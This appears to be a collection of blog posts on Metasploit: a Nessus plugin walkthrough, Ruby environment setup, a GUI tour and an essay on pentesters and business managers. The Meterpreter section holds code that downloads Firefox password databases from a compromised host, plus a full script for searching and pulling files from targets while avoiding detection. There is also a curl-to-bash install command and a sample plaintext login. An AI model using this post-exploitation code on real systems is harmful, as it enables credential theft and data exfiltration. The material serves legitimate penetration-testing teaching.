New Nessus Plug-In For Metasploit

Zate Berg has contributed this week the a plug-in for controlling Nessus from inside msfconsole. I do have to say he has put a lot of work in a very small amount of time learning Ruby and coding this plugin in only a few weeks. The plug-in is now part of the Development Brach of the project and several patches have been summited by him and progress has been quick.

First thing is to get the new plugin is to “svn up” to the latest development version of the project and do make sure that your Nessus server is up and running. One note do you must have already created Policies in you server and have them available to the account you will use to login to the Nessus Server.

Lets load the plugin and get and output of the commands available:

 

msf > load nessus
[*] Nessus Bridge for Nessus 4.2.x
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
msf > nessus_help 
[+] Nessus Help
[+] type nessus_help <command> for help with specific commands
Command                    Help Text
-------                    ---------
Generic Commands           
-----------------          -----------------
nessus_connect             Connect to a nessus server
nessus_logout              Logout from the nessus server
nessus_help                Listing of available nessus commands
nessus_server_status       Check the status of your Nessus Server
nessus_admin               Checks if user is an admin
nessus_server_feed         Nessus Feed Type
nessus_find_targets        Try to find vulnerable targets from a report
                           
Reports Commands           
-----------------          -----------------
nessus_report_list         List all Nessus reports
nessus_report_get          Import a report from the nessus server in Nessus v2 format
nessus_report_hosts        Get list of hosts from a report
nessus_report_host_ports   Get list of open ports from a host from a report
nessus_report_host_detail  Detail from a report item on a host
                           
Scan Commands              
-----------------          -----------------
nessus_scan_new            Create new Nessus Scan
nessus_scan_status         List all currently running Nessus scans
nessus_scan_pause          Pause a Nessus Scan
nessus_scan_pause_all      Pause all Nessus Scans
nessus_scan_stop           Stop a Nessus Scan
nessus_scan_stop_all       Stop all Nessus Scans
nessus_scan_resume         Resume a Nessus Scan
nessus_scan_resume_all     Resume all Nessus Scans
                           
Plugin Commands            
-----------------          -----------------
nessus_plugin_list         Displays each plugin family and the number of plugins
nessus_plugin_family       List plugins in a family
nessus_plugin_details      List details of a particular plugin
                           
User Commands              
-----------------          -----------------
nessus_user_list           Show Nessus Users
nessus_user_add            Add a new Nessus User
nessus_user_del            Delete a Nessus User
nessus_user_passwd         Change Nessus Users Password
                           
Policy Commands            
-----------------          -----------------
nessus_policy_list         List all polciies
nessus_policy_del          Delete a policy

 

As it can be seen there are a lot of commands to choose from. According to Zate Berg not all commands are implemented and that he has 80% of them done at the time of this blog post is written. With the development version we can start playing and familiarizing ourselves with the plugin as it advances. Lets connect to our Nessus Server, this server can be local or remote:

msf > nessus_connect carlos:$ecret4blog@192.168.1.231 ok
[*] Connecting to https://192.168.1.231:8834/ as carlos
[*] Authenticated
msf >

Once we have connected to our server we can check what policies have we defined and use those for performing a scan:

 

msf > nessus_policy_list 
[+] Nessus Policy List
ID  Name     Owner   visability
--  ----     -----   ----------
-1  General  carlos  shared
msf > nessus_scan_new -h
[*] Usage: 
[*]        nessus_scan_new <policy id> <scan name> <targets>
[*]        use nessus_policy_list to list all available policies
msf > nessus_scan_new -1 homelab 192.168.1.1/24
[*] Creating scan from policy number -1, called "homelab" and scanning 192.168.1.1/24
[*] Scan started.  uid is 1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196

The scan started and we get an uid of 1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196 this ID is important because we will use this ID in next commands so we can check the status of the scan:

msf > nessus_scan_status 
[*] Connecting to https://192.168.1.231:8834/ as carlos
[*] Authenticated
[+] Running Scans
Scan ID                                               Name     Owner   Started            Status   Current Hosts  Total Hosts
-------                                               ----     -----   -------            ------   -------------  -----------
1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196  homelab  carlos  15:46 Sep 26 2010  running  79             254
[*] You can:
[+] 		Import Nessus report to database : 	nessus_report_get <reportid>
[+] 		Pause a nessus scan : 			nessus_scan_pause <scanid>
msf > nessus_scan_status 
[*] Connecting to https://192.168.1.231:8834/ as carlos
[*] Authenticated
[+] Running Scans
Scan ID                                               Name     Owner   Started            Status   Current Hosts  Total Hosts
-------                                               ----     -----   -------            ------   -------------  -----------
1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196  homelab  carlos  15:46 Sep 26 2010  running  239            254
[*] You can:
[+] 		Import Nessus report to database : 	nessus_report_get <reportid>
[+] 		Pause a nessus scan : 			nessus_scan_pause <scanid>
msf > nessus_scan_status 
[*] Connecting to https://192.168.1.231:8834/ as carlos
[*] Authenticated
[+] Running Scans
Scan ID                                               Name     Owner   Started            Status   Current Hosts  Total Hosts
-------                                               ----     -----   -------            ------   -------------  -----------
1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196  homelab  carlos  15:46 Sep 26 2010  running  242            254
[*] You can:
[+] 		Import Nessus report to database : 	nessus_report_get <reportid>
[+] 		Pause a nessus scan : 			nessus_scan_pause <scanid>
msf > nessus_scan_status 
[*] Connecting to https://192.168.1.231:8834/ as carlos
[*] Authenticated
[+] Running Scans
Scan ID                                               Name     Owner   Started            Status   Current Hosts  Total Hosts
-------                                               ----     -----   -------            ------   -------------  -----------
1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196  homelab  carlos  15:46 Sep 26 2010  running  249            254
[*] You can:
[+] 		Import Nessus report to database : 	nessus_report_get <reportid>
[+] 		Pause a nessus scan : 			nessus_scan_pause <scanid>
msf > nessus_scan_status 
[*] Connecting to https://192.168.1.231:8834/ as carlos
[*] Authenticated
[*] No Scans Running.
[*] You can:
[*]         List of completed scans:     	nessus_report_list
[*]         Create a scan:           		nessus_scan_new <policy id> <scan name> <target(s)>
msf > n

As it can be seen in the example above we can see the host count as they are scanned once finished we will see that the scan disappears from the status info. Lets check the results of our scan:

msf > nessus_report_list 
[+] Nessus Report List
ID                                                    Name     Status     Date
--                                                    ----     ------     ----
1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196  homelab  completed  15:52 Sep 26 2010
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>
msf > nessus_report_hosts
[*] Usage: 
[*]        nessus_report_hosts <report id>
[*]        use nessus_report_list to list all available reports
msf > nessus_report_hosts 1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196
[+] Report Info
Hostname       Severity  Sev 0  Sev 1  Sev 2  Sev 3  Current Progress  Total Progress
--------       --------  -----  -----  -----  -----  ----------------  --------------
192.168.1.1    24        4      23     1      0      38873             38873
192.168.1.100  5         0      5      0      0      38873             38873
192.168.1.109  3         0      3      0      0      38873             38873
192.168.1.171  214       15     61     20     133    35764             38873
192.168.1.229  12        1      11     1      0      38096             38873
192.168.1.231  38        6      27     5      6      38873             38873
192.168.1.234  20        4      20     0      0      38873             38873
192.168.1.236  28        5      26     2      0      38096             38873
192.168.1.237  5         0      5      0      0      38873             38873
192.168.1.240  159       15     62     12     85     38873             38873
192.168.1.241  32        5      30     1      1      38096             38873
192.168.1.242  31        5      29     1      1      19437             38873
192.168.1.243  6         0      6      0      0      38873             38873
192.168.1.244  23        6      23     0      0      38873             38873
192.168.1.245  17        3      16     1      0      38873             38873
[*] You can:
[*]         Get information from a particular host:          nessus_report_host_ports <hostname> <report id>

As it can be seen from the output above I can see the number of plugins that returned positive and their count. We can now connect to our database and import the data so we can use other modules and plugins. I will connect to a SQLite DB <NOT RECOMMENDED FON PRODUCTION> I know it is buggy and not supported anymore but I will use it for simplicity for my example. Once the DB is created I import the report and parse it in to my MSF DB:

msf > db_connect msf.db
[-] Note that sqlite is not supported due to numerous issues.
[-] It may work, but don't count on it
[*] Creating a new database file...
[*] Successfully connected to the database
[*] File: msf.db
msf > nessus_report_get 1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196
[*] importing 1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196
msf > 

Know that it said it finished let’s check with db_hosts the imported records:

msf > db_hosts 
Hosts
=====
address        address6  arch  comm  comments  created_at               info  mac                name                          os_flavor  os_lang  os_name  os_sp  purpose  state  updated_at               svcs  vulns  workspace
-------        --------  ----  ----  --------  ----------               ----  ---                ----                          ---------  -------  -------  -----  -------  -----  ----------               ----  -----  ---------
192.168.1.1                                    2010-09-26 20:23:07 UTC        00:0D:B9:1D:8E:B4  ASAFW.local                                                              alive  2010-09-26 20:23:07 UTC  6     22     default
192.168.1.100                                  2010-09-26 20:23:06 UTC        00:26:BB:15:05:D8  loki.local                                                                 alive  2010-09-26 20:23:06 UTC  1     5      default
192.168.1.109                                  2010-09-26 20:23:06 UTC        7C:6D:62:E0:5E:CD  darkoperator-iPad.local                                                   alive  2010-09-26 20:23:06 UTC  0     3      default
192.168.1.171                                  2010-09-26 20:22:11 UTC        00:0C:29:A7:BD:AF                                                                             alive  2010-09-26 20:22:11 UTC  15    204    default
192.168.1.229                                  2010-09-26 20:22:09 UTC        00:23:32:34:1D:B7  AppleTV.local                                                              alive  2010-09-26 20:22:09 UTC  2     12     default
192.168.1.231                                  2010-09-26 20:22:03 UTC        00:0C:29:EE:13:87  ubuntu.local                                                               alive  2010-09-26 20:22:03 UTC  5     33     default
192.168.1.234                                  2010-09-26 20:22:03 UTC        00:1E:EC:A5:B9:86  pwnage01.local                                                             alive  2010-09-26 20:22:03 UTC  12    20     default
192.168.1.236                                  2010-09-26 20:22:01 UTC        00:0C:29:A2:19:2A  freenas.local                                                              alive  2010-09-26 20:22:01 UTC  6     28     default
192.168.1.237                                  2010-09-26 20:22:01 UTC        00:0C:29:F1:5D:96  winxp01.local                                                              alive  2010-09-26 20:22:01 UTC  0     5      default
192.168.1.240                                  2010-09-26 20:20:49 UTC        00:0C:29:F8:8F:82  win2k801.local                                                             alive  2010-09-26 20:20:49 UTC  15    154    default
192.168.1.241                                  2010-09-26 20:20:48 UTC        00:16:CB:9F:9E:11  infidel02.local                                                            alive  2010-09-26 20:20:48 UTC  7     31     default
192.168.1.242                                  2010-09-26 20:20:44 UTC        00:17:F2:99:D7:CF  infidel03.local                                                            alive  2010-09-26 20:20:44 UTC  7     30     default
192.168.1.243                                  2010-09-26 20:20:44 UTC        00:0C:29:25:89:66  win701.local                                                               alive  2010-09-26 20:20:44 UTC  1     6      default
192.168.1.244                                  2010-09-26 20:20:43 UTC        00:24:8C:5B:FC:B8  Infidel01.local                                                            alive  2010-09-26 20:20:43 UTC  12    23     default
192.168.1.245                                  2010-09-26 20:20:41 UTC        00:17:E0:3E:73:AA  TSGAP01.local                                                              alive  2010-09-26 20:20:41 UTC  3     15     default

As you can see you can do a lot with the plugin and it will get better with time because Zate is now addicted like many of us to coding for the framework. Do follow him on Twitter for updates @zate.

New Windows Meterpreter Search Functionality

Yesterday Stephen Fewer committed to the development version of Metasploit code for the Windows Version of Meterpreter for searching thru the file system and using the index service of the modern versions of Windows. The advantage of having this capability as part of the standard API is that it gets executed at the host and only matched entries are returned, before this mode all entries where returned and they had to be evaluated on the attackers machine and depending on the type of connection, the distance and path to the target this is a very slow process and generates a lot of traffic that can give away the actions being taken.

Here is an example of a search using the method described before from the enum_firefox script

def frfxpswd(path,usrnm)
    @client.fs.dir.foreach(path) {|x|
        next if x =~ /^(\.|\.\.)$/
        fullpath = path + '\\' + x
        if @client.fs.file.stat(fullpath).directory?
            frfxpswd(fullpath,usrnm)
        elsif fullpath =~ /(cert8.db|signons.sqlite|signons3.txt|key3.db)/i
            begin
                dst = x
                dst = @logs + ::File::Separator + usrnm + dst
                print_status("\tDownloading Firefox Password file to '#{dst}'")
                @client.fs.file.download_file(dst, fullpath)
            rescue
                print_error("\t******Failed to download file #{x}******")
                print_error("\t******Browser could be running******")
            end
        end
    }
end

As it can be seen on the first 6 lines of the code we have to use client.fs.dir.foreach and parse each entry and check that it is not the . and .. entries that are returned, then they are checked with client.fs.file.start(path).directory? to see if path is a Directory or a file, if it is a file we return it back to the function it self to search that directory, when a file is found its name is checked to se if it the file we are looking for and if it is we take the actions we want. This is very slow when we are dealing with a recursive search. Now if we want to search for files that match a specific pattern we can use client.fs.file.search(path,pattern,recursive) as you can see we pass to this call the path from where to start the search, if we provide as path nil it will search all drives, then we pass the pattern to search and last if we want the search to be recursive or not. This will return an array of hashes of what was found:

>> client.fs.file.search("c:\\","*.sys",false)
=> [{"name"=>"hiberfil.sys", "size"=>2139795456, "path"=>"c:"}, {"name"=>"pagefile.sys", "size"=>4284719104, "path"=>"c:"}]

As it can be seen the elements of the hash are name, path and size in bytes, if no file is found the length of the array will be 0 if a wrong path is provided an operation error 3 will be raised

>> client.fs.file.search("x:\\","*.sys",false)
Rex::Post::Meterpreter::RequestError: stdapi_fs_search: Operation failed: 3

One advantage provided by this call also is that on recent versions of windows like on Vista, 7 and 2008 it will use the index service and will give us the ability to search the Internet Explorer history and MAPI (email) entries. Just by specifying as the path for the search iehistory for Internet Explorer history and mapi for searching email entries. The entries found will be presented in the name element of hash. One important note is that when searching thru the MAPI and Internet Explorer entries recursive type search must be used. Now if we want to use this from inside Meterpreter we just use the search command:

meterpreter > search -h
Usage: search [-d dir] [-r recurse] -f pattern
Search for files.
OPTIONS:
-d <opt> The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
-f <opt> The file pattern glob to search for. (e.g. *secret*.doc?)
-h Help Banner.
-r <opt> Recursivly search sub directories. (Default: true)

The options are simple with the –d option we specify the path if none is given it will search all drives on the target machine. With the –f option we provide the search glob that will be user to match what file information will be returned to the attackers machine, the –r option with a given value of true or false to specify if the search will be recursive or not.

meterpreter > search -d c:\\ -f *.sys -r false
Found 2 results...
c:\hiberfil.sys (2139795456 bytes)
c:\pagefile.sys (4284719104 bytes)
meterpreter > 

Now lets create a small script to aid us in a pentest to find, select and download files from a target system.

Lets start by defining what we want the script to do:

· We got to be able to search for different things at once.

· We have to save the results to a file we can edit.

· We have to use the modified file to download those files we want.

· We have to provide a start directory for the search.

· We have to be able to control if the search will be recursive or not.

So lets start by declaring our variables and setting what the options of the script will be:

@client = client
location = nil
search_blob = nil
input_file = nil
output_file = nil
recurse = false
logs = nil
@opts = Rex::Parser::Arguments.new(
    "-h" => [false, "Help menu." ],
    "-i" => [true, "Input file with list of files to download, one per line."],
    "-d" => [true, "Directory to start search on, search will be recursive."],
    "-f" => [true, "Search blobs separated by a |."],
    "-o" => [true, "Output File to save the full path of files found."],
    "-r" => [false, "Search subdirectories."],
    "-l" => [true, "Location where to save the files."]
)

These variables will hold the values of the options:

· Location to hold the path of where the search will start.

· Search_blob to hold our seach blobs.

· Input_file to hold the file that we will feed the script for download.

· Output_file to hold the name and location of the file we will write the results to.

· Recurse will be a Boolean value to determine if the search will be recursive or not.

· Logs to specify where the downloaded files will be saved to.

We add the customary usage function:

# Function for displaying help message
def usage
    print_line "Meterpreter Script for searching and downloading files that"
    print_line "match a specific pattern."
    print_line(@opts.usage)
    raise Rex::Script::Completed
end

Next we check the version of Meterpreter to make sure we run on the Windows version and not the Java or PHP version that do not contain the search API call since it is not implemented on this versions.

# Check that we are running under the right type of Meterpreter, if not show and error mesage and make sure we have arguments if not show the usage of the script.
if client.platform =~ /win32|win64/
    if args.length > 0
        …………
    else
        usage
    end
else
    print_error["This script is not supported on this version of Meterpreter."]
end

Once we have all of our checks in place we will parse the options and populate our variables with the information that we need to get our tasks done.

@opts.parse(args) { |opt, idx, val|
    case opt
    when "-h"
        usage
    when "-i"
        input_file = val
    when "-o"
        output_file = val
    when "-d"
        location = val
    when "-f"
        search_blob = val.split("|")
    when "-r"
        recurse = true
    when "-l"
        logs = val
    end
}

You will see that for the –f option we are splitting the values given and returns an array with each element containing each of the search strings we want to search for. Now that we have populated the variables with the values of the options we passes to the script we can know perform the task for what we wrote the script for. First thing we will do is perform our search making sure we provided a source directory and we make sure our search blob array contains values.

# Search for files and save their location if specified
if search_blob.length > 0 and location
    search_blob.each do |s|
        print_status("Searching for #{s}")
        results = @client.fs.file.search(location,s,recurse)
        results.each do |file|
            print_status("\t#{file['path']}\\#{file['name']} (#{file['size']} bytes)")
            file_local_write(output_file,"#{file['path']}\\#{file['name']}") if output_file
        end
    end
end

As you can see we will only write the results to a file if we provided an output file, by using the file_local_write Meterpreter mixin we make sure that if the file does not exist it will be created for us and save us from writing a function for writing what we want to a file. Now we will add the code for reading our file after we edited it and decided which ones we want to download.

# Read log file and download those files found
if input_file and logs
    if ::File.exists?(input_file)
        print_status("Reading file #{input_file}")
        ::File.open(input_file, "r").each_line do |line|
            print_status("Downloading #{line.chomp}")
            @client.fs.file.download(logs, line.chomp)
        end
    else
        print_error("File #{input_file} does not exist!")
    end
end

The script would be used to search for specific files, now one thing to consider when doing the searching is that searching all disk will cause I/O activity on the system that is bound to be detected if:

1. There is monitoring software in the case of servers.

2. A user is currently using the target machine.

So it is very important to check the idle time of the user on the box, check processes and installed software on that box to make sure your action will not be detected if you run the search thru out the system. A target search of the users profile is a better approach in the case of desktop system since Windows and applications tends to save most data in those folders, using the get_env script can aid in identifying the location of this folders since it will show user and system environment variables. Also do check the size of the files before downloading, you would not have much success trying to download a 2GB PST thru a 300kb connection. I do hope you found this blog post useful and informative.

Full script:

 

@client = client
location = nil
search_blob = nil
input_file = nil
output_file = nil
recurse = false
logs = nil
@opts = Rex::Parser::Arguments.new(
    "-h" => [false, "Help menu." ],
    "-i" => [true, "Input file with list of files to download, one per line."],
    "-d" => [true, "Directory to start search on, search will be recursive."],
    "-f" => [true, "Search blobs separated by a |."],
    "-o" => [true, "Output File to save the full path of files found."],
    "-r" => [false, "Search subdirectories."],
    "-l" => [true, "Location where to save the files."]
)
# Function for displaying help message
def usage
    print_line "Meterpreter Script for searching and downloading files that"
    print_line "match a specific pattern."
    print_line(@opts.usage)
    raise Rex::Script::Completed
end
# Check that we are running under the right type of Meterpreter
if client.platform =~ /win32|win64/
    # Parse the options
    if args.length > 0
        @opts.parse(args) { |opt, idx, val|
            case opt
            when "-h"
                usage
            when "-i"
                input_file = val
            when "-o"
                output_file = val
            when "-d"
                location = val
            when "-f"
                search_blob = val.split("|")
            when "-r"
                recurse = true
            when "-l"
                logs = val
            end
        }
        # Search for files and save their location if specified
        if search_blob.length > 0 and location
            search_blob.each do |s|
                print_status("Searching for #{s}")
                results = @client.fs.file.search(location,s,recurse)
                results.each do |file|
                    print_status("\t#{file['path']}\\#{file['name']} (#{file['size']} bytes)")
                    file_local_write(output_file,"#{file['path']}\\#{file['name']}") if output_file
                end
            end
        end
        # Read log file and download those files found
        if input_file and logs
            if ::File.exists?(input_file)
                print_status("Reading file #{input_file}")
                ::File.open(input_file, "r").each_line do |line|
                    print_status("Downloading #{line.chomp}")
                    @client.fs.file.download(logs, line.chomp)
                end
            else
                print_error("File #{input_file} does not exist!")
            end
        end
    else
        usage
    end
else
    print_error["This script is not supported on this version of Meterpreter."]
end

Metasploit New GUI

A new GUI for Metasploit was added yesterday by ScriptJunkie to the Metasploit SVN Repository, this is the first version of a development version  as part of the Framework that is going to be improved and worked one as time progress. This new GUI is multi-platform and it is based on Java, the Netbeans project for it can be found in the external/source/gui/msfguijava/ directory for those who want to contribute and have Ninja Skills with Java and user interfaces. The GUI can be ran by invoking the msfgui script at the base of the Metasploit directory

./msfgui

This script simply executes the following command:

java -jar `dirname $0`/data/gui/msfgui.jar

Now to be able to run this GUI Java must be installed on the machine. Wen you run the command you should be greated by the following splash screen followed by this user interface:

image

Now this interface does not start since it can be used to connect to a remote msfrpcd session in another host. To start a msfrpcd session on a host so as to be able to connect remotely with msfgui the following command must be ran on that host:

./msfrpcd -S -U MetaUser -P Securepass -p 1337

we tell the msfrpcd Daemon to start with SSL disabled since there is no support for it right now, we specify the user with the –U switch, the password with the –P switch and the port to listen for inbound connection with the –p switch. The service will bind to the 0.0.0.0 address so it well listen on all interfaces, in the case you want it to bind to a specific interface you just tell it to what IP address to bind to with the –a switch and pass the IP as an option. When you run the command above the output should look something like this:

loki:msf3 cperez$ ./msfrpcd -S -U MetaUser -P Securepass -p 1337
[*] XMLRPC starting on 0.0.0.0:1337 (NO SSL):Basic...
[*] XMLRPC initializing...
[*] XMLRPC backgrounding...

Once it is up we just use the use connect to msfrpcd option in the File menu

image

This will bring up the following screen

image

 

There we just enter the data we set up at our remote host, we can also start a new connection from this screen and even change the path for our Metasploit folder to another copy if we wish to using the change path button.

To start a new session with the local copy just select the Start new msfrpcd option from the File menu, this will automatically start a msfrpcd session for you using the copy of Metasploit from where you launched msfgui. Once started we can the interact with it. Lest launch a Multi handler to receive some Meterpreter connections:

image
Once we select the multi handler a screen will appear that will let use choose our payload, depending on the payload we will be able to set the parameters for it:

image

 

image
Once we have set the options needed for our shell we just hit Run Exploit to launch the job and it should appear in the jobs screen as shown below:

image

When the Meterpreter session is received and established it will appear in the Sessions window and we can interact with it.

image

To interact with our shell we can simply select it and left click on it to provide the options of what we can do. One of the thing I like about what is being done with the GUI is the way that the Meterpreter scripts where integrated as actions on the menu with easy to understand groupings as well as most common commands. 

image
Here is the screen we would see if we selected form the System Information the Windows Enumeration, this launches the Winenum script and we can see it’s progress. We can even enter commands in the dialog box below and hit summit to send a command to the Meterpreter session once the script is finished.


image

We can even decide to access the servers file system and interact with it.

image

For pentesters do check under post exploitation the report feature for HTML activity log of what was done in the shell and Meterpreter sessions. I do invite you to play with the other options, modules and menu items and provide feedback including bug reports and features request for stuff to add the GUI. If you are a Java ninja you can provide patches and code that is also welcomed, you can do this at http://www.metasploit.com/redmine/projects/framework

Setting up RVM and IRB for Metasploit Development in Backtrack

In this blogpost I will cover the installation of a base Ruby base environment for the use in developing and testing Metasploit modules, exploits and scripts. The instruction will be based on a Backtrack 4 base system since it has most of the dependencies already setup for many of the components that will be installed but it can easily be modified for use in any Ubuntu based Linux distro.

The first step is to make sure we are running the latest version of all packages on the system this is very easily done by using the aptitude package manager from a terminal to update our package database and upgrade all necessary packages. The command will be as follows running as root:

aptitude update && aptitude upgrade 

Once it finishes and we have all of the current packages upgraded we install the Git distributed version control system by running the following command as root:

aptitude install git-core 

Once Git is install we will install the Ruby Version Manager this will allow us to have on our system different version of Ruby each with it own gem repository and allow us to change, update and manage the different version by using one single tool. We will install RVM using the script they provide for installation by running the following command:

bash < <( curl http://rvm.beginrescueend.com/releases/rvm-install-head ) 

Once it is finished open your .bashrc file in your favorite text editor and add the following lines to the end of the file

 # Load RVM source
 if [[ -s "/usr/local/rvm/scripts/rvm" ]]  ; then source "/usr/local/rvm/scripts/rvm" ; fi
 # Enable Tab Completion in RVM
 [[ -r /usr/local/rvm//scripts/completion ]] && source /usr/local/rvm/scripts/completion

Save and close the file, next we run the following command to load the source to be able to use RVM:

 source /usr/local/rvm/scripts/rvm

   
Now we will install 2 versions of Ruby, Ruby 1.8.7 and 1.9.1

 rvm install 1.9.1
 rvm install 1.8.7

Even do you can install several versions at the same time I prefer to install one by one as shown in the commands above. you can test if the version switching is working by running the following command:

 rvm 1.9.1
 ruby -v
 rvm 1.8.7
 ruby -v 

Each time we invoke the ruby interpreter with the version command switch we should see that the version changed. Next we need to install the necessary ruby gems into each of the gem repositories of each one of the ruby versions we achieve this with the rvm command.

 rvm gem install hpricot
 rvm gem install sqlite3-ruby
 rvm gem install pg
 rvm gem install wirble
 rvm gem install mysql 

Once all gems are installed we set Ruby 1.9.1 as our default version with the following command:

 rvm 1.9.1 --default 

Now that we have our base ruby environment we can use, we can proceed to configure some global configuration parameters for the Interactive Ruby Shell also known as IRB. The IRB allow us ti interact directly with the ruby interpreter allowing us to test and validate commands and API calls. The following steps are optional and are not required and you can take what ever part of the following configuration better meets your personal style and needs. First we need to create the file:

 touch ~/.irbrc 

This file will be read by the IRB every time we run it. IRB can be invoked from the regular bash shell, from inside msfconsole and from inside a Meterpreter shell. The libraries and method loaded will depend on from where you run the irb command, you can load this libraries from inside the .irbrc file but for simplicity I will only cover some general settings and code that can later be expanded on as the skill level on ruby an the framework progresses. For a bit more information on IRB visit: http://ruby-doc.org/docs/ProgrammingRuby/html/irb.html

Let start by adding a line that will let us know that the .irbrc file is loaded:

 puts "Loaded ~/.irbrc" 

Next we will make sure that Ruby gems are always loaded when working inside IRB:

 require 'rubygems'

   
Next we load the Wirble library so we can have syntax coloring, history and tab autocompletion inside the IRB:

 require 'wirble'


Lets add IRB's own tab autocompletion since in my experience I have found it to be faster and differentiates methods depending of the object type in Ruby 1.9.1:

 require 'irb/completion' 

Now we load a initialize Wirble:

 Wirble.init
 Wirble.colorize

Next we add auto indentation for IRB:

 IRB.conf[:AUTO_INDENT] = true 

Next to simplify the enumeration of methods when we want to do a quick look at what we can do with an object we modify the object class and add a method call local_methods to aid in this so we add:

class Object
  # get all the methods for an object that aren't basic methods from Object
  def local_methods
    (methods - Object.instance_methods).sort
  end
end 

Our file should now look like this:

puts "Loaded ~/.irbrc"
# Load Lobraries
require 'rubygems'
require 'wirble'
require 'irb/completion' 
# Enable Indentation in irb
IRB.conf[:AUTO_INDENT] = true 
# Enable Syntax Coloring 
Wirble.init
Wirble.colorize 
# get all the methods for an object that aren't basic methods from Object
class Object
  def local_methods
    (methods - Object.instance_methods).sort
  end
end 

Now there is nothing more to do than to start coding and testing our code, I hope that you find this tips useful in your adventures coding for Metasploit in Ruby.

Teaching Old Dogs New Tricks Why Both Pentesters and Business Management Must Adapt

During the podcasters meet up in Shmoocon 2010 a very important subject came to discussion and it was that many pentesters do not know how business people think and how to talk with them and I do have to say that I agree fully with that notion. A great number of discussion have been made in forums, IRC chat channels, Blogs and Podcasts where the blame of many of the insecurities in most companies today is the complete fault of the business management side and I do not agree with this notion personally. The fault is a shared one. Both sides are at fault. Both sides need to change their training and the way both approach their jobs.

 

Many times we see again and again pentesters complain that they presented to management at their client the vulnerabilities, shells and information they where able to ascertain on the target network and management did not understood or dismissed what they said causing no change in the clients environment. For me this statement raises several questions, do we as community encourage that pentesters learn in addition to their technical body of knowledge that they must master that they also acquire soft skills in report writing, public speaking, project management, risk analysis and basic business logic?  Do we require that management and business people have an understanding of how information systems operate, the risks these systems are exposed to and how this risks may impact their business operation? They learn about accounting, markets, trends and many other areas but the focus given to information system is a low one.

 

The skills mentioned above for pentester to acquire are needed but for most of us this type of training is like pulling teeth, we hate it, but if the tooth is rotten it must be removed. Mastery of a field does not come by practicing what we know again and again but by training and practicing deliberately on that we are not good at and must master. We talk also a lot about the process we fallow while attacking a client system during a pentest, what we must do during a code review, vulnerability assessment and incident response but we are at the end consultants providing a service to a client, a service that the client needs so we must understand our client, how he does business, what he considers as risk for his business and what he has in place to be able to achieve his business goals, once we know all of this information we will get a pretty good picture of what systems and processes are those that should be targeted during our work, also it is important to know and have very clear what we can do and what we can not do so having clear ROE (Rules of Engagement) are of great importance since we will know our boundaries. We have to remember that our actions if not controlled can cost our clients large amounts of money and probably image problems. During the definition of them with the client we can get a clear look at his worries, his mind set and his general demeanor, this can be taken like applying Social Engineering skills since the concepts are similar just the result is what is a bit different. We also have to be honest not all consultants have the necessary skills to go in front of a business person and transmit the desired message in a way that the business side can understand and are given a clear track of what they can do to improve the risk posture of their business and the values of what was found to it, this is one of the main reasons I like that consultants work in groups, each with their specialty so as to achieve the best results, the specialty of managing the technical group and work as a mediator should be a project manager or senior consultant that has the business and technical knowledge to transmit findings and keep the focus of the team doing the work at what matters the most for a client, whish is nothing more that reducing the risks to his business and how such risk affects his bottom line. Still each person that wants to be a good security consultant, be it as a Pentester, Incident Response Specialist of any other security position as it may be called must have this knowledge and know how to apply it in the work they do.

 

On the management side knowing how information systems work, regulations that govern their use, what are best practices for their use and how they relate to the way that businesses are now dependant on this systems. In the new information age being connected is of great importance since they are just a couple of milliseconds away from every script kiddy that wants to make a name of themselves, every corporate spy, criminal organization and curious soul out there so knowing that speed is important but being careful and managing the risks of this new way of doing business must be taken in to account. Proper training and education must be given to the new generation of business majors and to influence the current crop of executives out there to adapt to this new changes. They must see that security services provided by external and internal entities help minimize risk so they remain profitable and nimble enough to adapt to change. Training in laws and regulation is a must, from the domains in the CISSP, PCI, Gramm-Leach-Bliley Act and many others out there, not only the ones in the US but also those in Europe and other continents so as to understand how to comply, look to improve on top and adapt to this regulations so as to help them in their business. Management and procedures for information systems like ITTIL and NIST must be studied so as to have a base of knowledge of what takes to administer this systems and understand what an IT department must provide as a base for their operation, understand some of the reason why proper budgeting is important for security and other risks mitigation factors that must be considered.

 

At the end I do believe that the way new business men and security consultants are trained and operate must evolve to be able to handle not only how business, economy and systems have changed but also how security is no longer some black art but a field with structure and body of knowledge that makes it critical for any operation in today’s market. Both side must know how to manage risk by knowing how to transfer, eliminate and mitigate it, and where it makes sense to do each.  

 

Note: Special Thanks to Chris Nickerson for the proof reading and helping me re-express some of the ideas.